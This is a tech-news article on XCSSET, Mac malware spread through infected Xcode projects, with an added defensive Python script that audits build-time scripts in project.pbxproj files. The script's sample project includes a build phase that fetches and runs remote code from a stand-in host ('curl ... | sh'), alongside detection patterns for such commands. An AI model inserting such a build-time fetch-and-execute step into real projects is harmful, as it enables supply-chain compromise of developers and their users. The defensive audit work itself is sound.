Developers
September 17, 2020

Dangerous New Mac Malware Uses Xcode to Spread

Trend Micro has discovered a dangerous new Mac malware that could lead to supply chain attacks.

Apple’s Mac platform has traditionally been more secure than Windows, thanks to a combination of factors. One of those factors is that macOS is based on UNIX, an inherently secure operating system. Another factor has been “security through obscurity.” In other words, because the macOS market share was relatively small, it wasn’t worth it for hackers to target the platform.

In recent years, the status quo has begun to change. There has been a significant rise in the number and type of malware targeting macOS, thanks largely to its growing market share. One of the most dangerous, however, is one that Trend Micro recently discovered. This new malware injects itself into Xcode projects and could result in major supply chain attacks.

The Danger of Supply Chain Attacks

A supply chain attack is one where hackers are able to inject code into a project or codebase. As a result, anyone downstream of the attack can be impacted.

In the world of hacking, where an effort is made to maximize the return on investment, a supply chain attack is a holy grail. A single well-executed attack can have far-reaching implications.

When it comes to supply chain attacks, few are as dangerous as one that impacts the very tools used to create software. Successfully pull off this kind of attack, and every piece of software created with that development tool could be compromised. This kind of attack would cross industries, platforms, types of software, and more.

Unfortunately for Mac developers, Trend Micro discovered a type of malware that does just that.

Trend Micro’s Findings

Trend Micro’s investigation uncovered some disturbing details regarding this particular malware, dubbed XCSSET:

“We have discovered an unusual infection related to Xcode developer projects. Upon further investigation, we discovered that a developer’s Xcode project at large contained the source malware, which leads to a rabbit hole of malicious payloads. Most notable in our investigation is the discovery of two zero-day exploits: one is used to steal cookies via a flaw in the behavior of Data Vaults, another is used to abuse the development version of Safari.

“This scenario is quite unusual; in this case, malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run. This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects. We have also identified this threat in sources such as VirusTotal, which indicates this threat is at large.”

Rather than being a proof-of-concept malware, XCSSET actively steals data:

“This threat primarily spreads via Xcode projects and maliciously modified applications created from the malware. It is not yet clear how the threat initially enters these systems. Presumably, these systems would be primarily used by developers. These Xcode projects have been modified such that upon building, these projects would run malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.”

In addition, Trend Micro detailed the various applications XCSSET can steal data from:

“Once present on an affected system, XCSSET is capable of the following behavior:

• Using exploits, it abuses the existing Safari and other installed browsers to steal user data. In particular, it:
  • Uses a vulnerability to read and dump Safari cookies
  • Uses the Safari development version to inject JavaScript backdoors onto websites via a Universal Cross-site Scripting (UXSS) attack
• It steals information from the user’s Evernote, Notes, Skype, Telegram, QQ, and WeChat apps
• It takes screenshots of the user’s current screen
• It uploads files from the affected machines to the attacker’s specified server
• It encrypts files and shows a ransom note if commanded by the server

“The method of distribution used can only be described as clever. Affected developers will unwittingly distribute the malicious trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files.”

How to Avoid XCSSET

Given how recently this malware was discovered, it may take some time to determine its full impact, and how many systems it has compromised.

In the meantime, Trend Micro recommends that Mac users only download software from trusted marketplaces. For developers who download and use third-party resources and libraries, it’s important to invest in a good, multi-layered security solution.
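Hash checks fail here because the compromised project is exactly what gets hashed. What a developer can do before building a third-party Xcode project is list every script the project executes at build time and read it. The following is an added example, not code from this article or from Trend Micro: a Python audit script that parses a project.pbxproj (an OpenStep-style plist that Python's plistlib cannot read) for PBXShellScriptBuildPhase and PBXBuildRule objects and flags scripts matching a few heuristic patterns. The patterns and the embedded sample project are constructed for the example and are not indicators taken from the XCSSET report.

```python
"""Audit an Xcode project.pbxproj for scripts that run at build time.

Added example, not code from the article or from Trend Micro's report.
"""
import re
from dataclasses import dataclass, field

# Heuristics a reviewer might flag in a build-time script. These are
# assumptions for the example, not indicators from the XCSSET report.
REVIEW_PATTERNS = {
    "downloads remote content": re.compile(r"\b(curl|wget)\b"),
    "pipes into a shell": re.compile(r"\|\s*(sh|bash|zsh)\b"),
    "decodes embedded data": re.compile(r"\bbase64\b"),
    "evaluates constructed commands": re.compile(r"\beval\b"),
}

# Every entry in the pbxproj `objects` table starts with a 24-hex-digit id.
OBJECT_HEADER = re.compile(r"^\s*([0-9A-F]{24}) /\* (.*?) \*/ = \{\s*$")
QUOTED = re.compile(r'"(?:\\.|[^"\\])*"')

# Constructed sample project: one ordinary lint phase, one phase that fetches
# and executes remote content at build time, and one build rule.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    objects = {
        AA0000000000000000000001 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            files = (
            );
        };
        AA0000000000000000000002 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run SwiftLint";
            shellPath = /bin/sh;
            shellScript = "[ -n \"$(which swiftlint)\" ] && swiftlint\n";
        };
        AA0000000000000000000003 /* ShellScript */ = {
            isa = PBXShellScriptBuildPhase;
            shellPath = /bin/sh;
            shellScript = "curl -s http://example.invalid/setup | sh\n";
        };
        AA0000000000000000000004 /* PBXBuildRule */ = {
            isa = PBXBuildRule;
            filePatterns = "*.gen";
            script = "cp \"$INPUT_FILE_PATH\" \"$DERIVED_FILE_DIR/\"\n";
        };
    };
}
'''


@dataclass
class BuildScript:
    object_id: str
    kind: str           # PBXShellScriptBuildPhase or PBXBuildRule
    name: str
    script: str
    flags: list = field(default_factory=list)


def iter_objects(text):
    """Yield (object_id, comment, body) for each entry of the objects table."""
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        m = OBJECT_HEADER.match(lines[i])
        i += 1
        if not m:
            continue
        depth, body = 1, []
        while i < len(lines) and depth > 0:
            line = lines[i]
            i += 1
            # Strip quoted strings before counting brackets so a script body
            # containing "$(...)" or "{...}" does not unbalance the parse.
            bare = QUOTED.sub('""', line)
            depth += bare.count("{") + bare.count("(") - bare.count("}") - bare.count(")")
            if depth > 0:
                body.append(line)
        yield m.group(1), m.group(2), "\n".join(body)


def get_value(body, key):
    """Return the value of `key = value;` inside an object body, unescaped."""
    m = re.search(r"\b" + re.escape(key) + r' = (?:"((?:\\.|[^"\\])*)"|([^;\n]+));', body)
    if not m:
        return None
    if m.group(1) is not None:
        return m.group(1).encode().decode("unicode_escape")
    return m.group(2).strip()


def audit_pbxproj(text):
    """Return every build-time script in the project with its review flags."""
    findings = []
    for oid, comment, body in iter_objects(text):
        isa = get_value(body, "isa")
        if isa == "PBXShellScriptBuildPhase":
            script = get_value(body, "shellScript") or ""
        elif isa == "PBXBuildRule":
            script = get_value(body, "script") or ""
        else:
            continue
        name = get_value(body, "name") or comment
        flags = [label for label, rx in REVIEW_PATTERNS.items() if rx.search(script)]
        findings.append(BuildScript(oid, isa, name, script, flags))
    return findings


if __name__ == "__main__":
    import sys
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for item in audit_pbxproj(source):
        print(f"[{'REVIEW' if item.flags else 'ok'}] {item.kind} {item.object_id} ({item.name})")
        for label in item.flags:
            print(f"    - {label}")
        print("    " + item.script.strip().replace("\n", "\n    "))
```

Run it with the path to a project's `project.pbxproj` to print each script phase and build rule along with its flags; without an argument it audits the embedded sample. The flags are only prompts for a human review: a flagged script is not necessarily malicious, and an unflagged one is still worth reading in full, since the point is to know what the build runs before running it.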

Many Mac users have long prided themselves on not needing the array of antivirus and anti-malware solutions Windows users have relied on for decades, despite experts warning of the growing risks. This latest finding makes it clear those days are gone for good. Every Mac user, and especially developers, should invest in a good security solution.

Tags: Xcode, Supply Chain Attacks, Malware, Security
Matt Milano
Technical Writer
Matt is a tech journalist and writer with a background in web and software development.
